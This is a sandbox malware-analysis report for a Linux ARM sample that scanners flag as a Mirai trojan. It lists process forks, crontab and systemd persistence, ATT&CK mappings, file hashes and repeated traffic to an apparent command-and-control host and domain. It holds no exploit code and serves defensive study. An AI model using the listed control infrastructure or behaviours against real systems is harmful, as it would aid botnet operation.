Linux
Analysis Report
armv4l.elf
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1558943 |
Start date and time: | 2024-11-20 01:00:14 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 58s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | armv4l.elf |
Detection: | MAL |
Classification: | mal68.troj.linELF@0/4@3/0 |
Command: | /tmp/armv4l.elf |
PID: | 5616 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | we kinda rocking ngl |
Standard Error: |
- system is lnxubuntu20
- armv4l.elf New Fork (PID: 5618, Parent: 5616)
- armv4l.elf New Fork (PID: 5620, Parent: 5618)
- armv4l.elf New Fork (PID: 5624, Parent: 5618)
- armv4l.elf New Fork (PID: 5626, Parent: 5618)
- armv4l.elf New Fork (PID: 5628, Parent: 5618)
- sh New Fork (PID: 5634, Parent: 5628)
- sh New Fork (PID: 5636, Parent: 5634)
- sh New Fork (PID: 5637, Parent: 5634)
- sh New Fork (PID: 5640, Parent: 5634)
- sh New Fork (PID: 5641, Parent: 5634)
- sh New Fork (PID: 5644, Parent: 5634)
- sh New Fork (PID: 5635, Parent: 5628)
- armv4l.elf New Fork (PID: 5645, Parent: 5618)
- sh New Fork (PID: 5647, Parent: 5645)
- systemd New Fork (PID: 5649, Parent: 5648)
- cleanup
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | ReversingLabs: |
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: |
Source: | Reads hosts file: | Jump to behavior |
Source: | Socket: | Jump to behavior |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: |
Source: | .symtab present: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File written: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | Directory: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior | ||
Source: | Chmod executable: | Jump to behavior |
Source: | Systemctl executable: | Jump to behavior |
Source: | Queries kernel information via 'uname': | Jump to behavior | ||
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Unix Shell Configuration Modification | 1 Unix Shell Configuration Modification | 1 File and Directory Permissions Modification | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Systemd Service | 1 Systemd Service | 1 Hidden Files and Directories | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Scripting | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
34% | ReversingLabs | Linux.Trojan.Mirai | ||
100% | Avira | EXP/ELF.Mirai.W |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
daisy.ubuntu.com | 162.213.35.24 | true | false | high | |
host.zopz-api.com | 172.111.38.48 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.111.38.48 | host.zopz-api.com | Reserved | 54540 | INCERO-HVVCUS | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
172.111.38.48 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
daisy.ubuntu.com | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
host.zopz-api.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
INCERO-HVVCUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | SystemBC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Process: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File Type: | |
Category: | dropped |
Size (bytes): | 76 |
Entropy (8bit): | 3.7627880354948586 |
Encrypted: | false |
SSDEEP: | 3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb |
MD5: | D86A1F5765F37989EB0EC3837AD13ECC |
SHA1: | D749672A734D9DEAFD61DCA501C6929EC431B83E |
SHA-256: | 85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45 |
SHA-512: | 338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/armv4l.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 178 |
Entropy (8bit): | 4.358630015292201 |
Encrypted: | false |
SSDEEP: | 3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL |
MD5: | C3685F292213652676F734AB36C060EE |
SHA1: | 1D05F7F6302EC60E7990DE4BBE9180C149EFC731 |
SHA-256: | D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C |
SHA-512: | 7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/armv4l.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 356 |
Entropy (8bit): | 4.9110117370593995 |
Encrypted: | false |
SSDEEP: | 6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7 |
MD5: | F03C70CD4C61A1852F9E19B8FB0D639C |
SHA1: | A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008 |
SHA-256: | AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90 |
SHA-512: | 6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 235 |
Entropy (8bit): | 5.096705576725245 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQLvjBMvZHGMQ5UYLtCFt3HY8jsHB:8QjHig8iJeHLUHY8mB |
MD5: | 43B042637824995BF6446D27C2D1BEFB |
SHA1: | 5EC9ADA45F79649C5F42C6A1B7A0605BE6B0E23B |
SHA-256: | 903D4D9E2F342C3CC58C045B32EF3D739291C60A63B579D97B43AA8D2F69FAAE |
SHA-512: | 06B67CE306A0E91106B2D4E266A566AF0B5AC229127A723E101357A9D994265F4D1311385FA3315945E29D0D367A2FDC02E6B7BE344D2C9D5026909120BE3B41 |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.108229534208223 |
TrID: |
|
File name: | armv4l.elf |
File size: | 78'696 bytes |
MD5: | b1de6afb7105e0da26b1a219f9f5031a |
SHA1: | e1b3179ec8a6646d27e522414487497720a273a8 |
SHA256: | ad9ce965f543f4b0e2993d08f40bcb29753c9020b4093f4db2f894745c53c9ea |
SHA512: | 8b0e05228979c21fe6a938e003bed521760b306860d12ccba026067511c9490ce752cb6c3232d506ebcb44cc502c0e69dd5ed260d7cc8c49b96c830e1dae7608 |
SSDEEP: | 1536:lxu6Nt3LUDmK+Y104tirDuaXy7K41N/DAzdLvws/:lk6N9LUxti3FmK4n8tws/ |
TLSH: | F973F942BD819F03C5C222F6F7EF01893B156BB9D5EB3242E925BF9033868DB1967251 |
File Content Preview: | .ELF...a..........(.........4...`1......4. ...(.......................................... ... ... .......f..........Q.td..................................-...L."....@..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 78176 |
Section Header Size: | 40 |
Number of Section Headers: | 13 |
Header String Table Index: | 12 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x8094 | 0x94 | 0x18 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.text | PROGBITS | 0x80b0 | 0xb0 | 0x103d8 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
.fini | PROGBITS | 0x18488 | 0x10488 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x1849c | 0x1049c | 0x1707 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.eh_frame | PROGBITS | 0x19ba4 | 0x11ba4 | 0x4 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.ctors | PROGBITS | 0x22000 | 0x12000 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x22008 | 0x12008 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.jcr | PROGBITS | 0x22010 | 0x12010 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x22014 | 0x12014 | 0x394 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x223a8 | 0x123a8 | 0x630c | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.comment | PROGBITS | 0x0 | 0x123a8 | 0xd60 | 0x0 | 0x0 | 0 | 0 | 1 | |
.shstrtab | STRTAB | 0x0 | 0x13108 | 0x56 | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x8000 | 0x8000 | 0x11ba8 | 0x11ba8 | 6.1303 | 0x5 | R E | 0x8000 | .init .text .fini .rodata .eh_frame | |
LOAD | 0x12000 | 0x22000 | 0x22000 | 0x3a8 | 0x66b4 | 3.0212 | 0x6 | RW | 0x8000 | .ctors .dtors .jcr .data .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 01:01:23.469803095 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:23.474672079 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:23.474720001 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:23.479756117 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:23.484622955 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:23.948640108 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:23.948873043 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:28.680466890 CET | 45160 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 01:01:28.685512066 CET | 53 | 45160 | 8.8.8.8 | 192.168.2.14 |
Nov 20, 2024 01:01:28.685604095 CET | 45160 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 01:01:28.685604095 CET | 45160 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 01:01:28.685656071 CET | 45160 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 01:01:28.690457106 CET | 53 | 45160 | 8.8.8.8 | 192.168.2.14 |
Nov 20, 2024 01:01:28.690469027 CET | 53 | 45160 | 8.8.8.8 | 192.168.2.14 |
Nov 20, 2024 01:01:28.949779987 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:28.949840069 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:28.949966908 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:28.954726934 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:29.129717112 CET | 53 | 45160 | 8.8.8.8 | 192.168.2.14 |
Nov 20, 2024 01:01:29.130012989 CET | 45160 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 01:01:29.262948990 CET | 53 | 45160 | 8.8.8.8 | 192.168.2.14 |
Nov 20, 2024 01:01:29.263175011 CET | 45160 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 01:01:31.130028963 CET | 53 | 45160 | 8.8.8.8 | 192.168.2.14 |
Nov 20, 2024 01:01:31.130179882 CET | 45160 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 01:01:31.135140896 CET | 53 | 45160 | 8.8.8.8 | 192.168.2.14 |
Nov 20, 2024 01:01:34.836822033 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:34.836891890 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:34.836977959 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:34.837018013 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:34.837080956 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:34.837172985 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:34.837234974 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:34.837338924 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:34.837378025 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:34.841907024 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:34.842050076 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:34.846856117 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:38.951030970 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:38.951116085 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:38.951147079 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:38.956006050 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:38.956085920 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:38.960899115 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:43.951185942 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:43.951246023 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:43.951289892 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:43.956166983 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:43.956221104 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:43.961098909 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:48.951560974 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:48.951646090 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:48.951688051 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:48.956609011 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:48.956682920 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:48.961550951 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:53.952198029 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:53.952285051 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:53.957475901 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:53.957536936 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:53.962480068 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:58.952678919 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:58.952810049 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:58.957667112 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:01:58.957741976 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:01:58.962585926 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:03.953150034 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:03.953322887 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:03.958290100 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:03.958347082 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:03.963241100 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:08.954327106 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:08.954464912 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:08.959373951 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:08.959433079 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:08.964267969 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:13.954997063 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:13.955600977 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:13.961225986 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:13.961316109 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:13.966434956 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:18.954592943 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:18.954864025 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:18.959780931 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:18.959876060 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:18.964767933 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:23.955682039 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:23.955821991 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:23.960783005 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:23.960871935 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:23.965799093 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:28.956132889 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:28.956346989 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:28.961220980 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:28.961373091 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:28.966265917 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:33.957293034 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:33.957412004 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:33.962333918 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:33.962429047 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:33.967308998 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:38.958106995 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:38.958259106 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:38.963148117 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:38.963211060 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:38.968102932 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:43.958460093 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:43.958625078 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:43.967453003 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:43.967506886 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:43.976331949 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:49.026916981 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:49.027076960 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:49.032047987 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:49.032164097 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:49.037246943 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:53.959932089 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:53.960160971 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:53.965152025 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:53.965234041 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:53.970148087 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:58.960525036 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:58.960812092 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:58.966877937 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:02:58.966989040 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:02:58.971900940 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:03.961641073 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:03.962930918 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:03:03.967983007 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:03.968067884 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:03:03.973119974 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:08.962224007 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:08.962395906 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:03:08.967302084 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:08.967395067 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:03:08.972315073 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:13.963042021 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:13.963258028 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:03:13.968967915 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:13.969063044 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:03:13.974695921 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:19.014769077 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:19.014991045 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:03:19.020018101 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 01:03:19.020096064 CET | 40008 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 01:03:19.025032997 CET | 1290 | 40008 | 172.111.38.48 | 192.168.2.14 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 01:01:23.431858063 CET | 51728 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 01:01:23.465831995 CET | 53 | 51728 | 1.1.1.1 | 192.168.2.14 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 20, 2024 01:01:23.431858063 CET | 192.168.2.14 | 1.1.1.1 | 0xfe1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
